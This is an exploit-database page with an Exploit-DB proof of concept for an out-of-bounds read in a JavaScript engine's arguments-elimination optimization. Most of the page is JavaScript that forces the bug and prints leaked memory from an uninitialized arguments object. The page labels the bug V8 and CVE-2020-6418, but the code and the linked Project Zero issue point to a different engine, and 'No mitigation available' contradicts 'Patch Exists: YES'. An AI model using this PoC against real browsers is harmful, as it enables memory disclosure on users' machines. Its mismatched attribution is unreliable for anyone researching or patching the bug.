header-logo
Suggest Exploit
vendor:
V8
by:
Project Zero
8,8
CVSS
HIGH
Out-of-Bounds Read
125
CWE
Product Name: V8
Affected Version From: V8 7.4.288.22
Affected Version To: V8 8.1.307.31
Patch Exists: YES
Related CWE: CVE-2020-6418
CPE: a:google:v8
Metasploit: https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/microsoft-edge-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-6418/https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2020-6418/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2020

V8 ArgumentsEliminationPhase::transform Out-of-Bounds Read

The vulnerability exists in the ArgumentsEliminationPhase::transform function of V8. Whether or not the 'argumentCountIncludingThis <= varargsData->limit' condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.

Mitigation:

No mitigation available
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262

Here is a snippet of ArgumentsEliminationPhase::transform
    case LoadVarargs:
        ...
        if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {
            ...
            if (argumentCountIncludingThis <= varargsData->limit) {
                storeArgumentCountIncludingThis(argumentCountIncludingThis);
                // store arguments
                ...
            }

            node->remove();
            node->origin.exitOK = canExit;
            break;
        }

Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.

PoC:
-->

const kArgsLength = 0x101;

let buggy = null;
function inlineFunc() {
    if (arguments.length != kArgsLength) {
        buggy = arguments;
    }
}

class ClassForInine extends inlineFunc {
}

function sleep(ms) {
    let start = new Date();
    while (new Date() - start < ms);
}

function main() {
    let args = new Array(kArgsLength);
    args.fill(333 + 1);
    args = args.join(', ');

    let opt = new Function(`(() => {
        new ClassForInine(${args});
    })();`);

    for (let i = 0; i < 0x100000; i++) {
        opt();

        if (i === 0x3000)
            sleep(1000);

        if (buggy) {
            print('buggy.length: ' + buggy.length);
            break;
        }
    }

    for (let i = 0, n = buggy.length; i < n; i++) {
        print(buggy[i]);
    }
}

main();

Navigation

Suggest Exploit

Services By CQR